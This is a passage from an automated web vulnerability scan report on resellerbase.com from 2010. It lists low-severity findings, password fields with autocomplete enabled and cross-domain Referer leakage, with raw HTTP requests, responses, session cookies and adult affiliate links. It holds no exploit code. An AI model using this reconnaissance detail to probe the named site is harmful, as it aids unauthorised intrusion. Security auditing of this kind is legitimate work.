Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:47:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


5. Password field with autocomplete enabled
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.resellerbase.com/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
<br />

<form action="login.php" method="post">
<input type="hidden" name="pflag" value="login" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...

5.2. http://www.resellerbase.com/login.php/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php/

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /login.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
<br />

<form action="login.php" method="post">
<input type="hidden" name="pflag" value="login" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...

5.3. http://www.resellerbase.com/register.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /register.php

Issue detail

The page contains a form with the following action URL: The form contains the following password fields with autocomplete enabled:

Request

GET /register.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Register</title>
<me
...[SNIP]...
<br />

<form action="register.php" method="post">
<input type="hidden" name="pflag" value="register" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...
<td><input class="text3" type="password" name="password2" size="40" value="" /></td>
...[SNIP]...

6. Cross-domain Referer leakage
There are 379 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.resellerbase.com/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /a

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /a?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.2. http://www.resellerbase.com/add.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /add.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /add.php?cat=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/add.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Add a Listing</title
...[SNIP]...
<input type="radio" name="gateway" value="paypal" checked="checked" />
   
   <img align="middle" src='http://www.paypal.com/images/x-click-but02.gif' border='0' alt='Make payments with PayPal - it is fast, free and secure!' />
   
</td>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.3. http://www.resellerbase.com/adult/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:28:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.4. http://www.resellerbase.com/adult/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/googlepr.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adult/googlepr.php?link_id=14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.5. http://www.resellerbase.com/adult/media-chat/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:29:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.6. http://www.resellerbase.com/adult/media-chat/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/googlepr.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adult/media-chat/googlepr.php?link_id=30 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.7. http://www.resellerbase.com/adult/media-chat/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.rivcash.com/?rcid=1281" name="link_42"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.rivcash.com/?rcid=1281" name="link_42"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.8. http://www.resellerbase.com/adult/media-chat/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/media-chat/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:31:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.9. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.10. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.11. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.12. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php

Summary

Severity: Information
Confidence: Certain
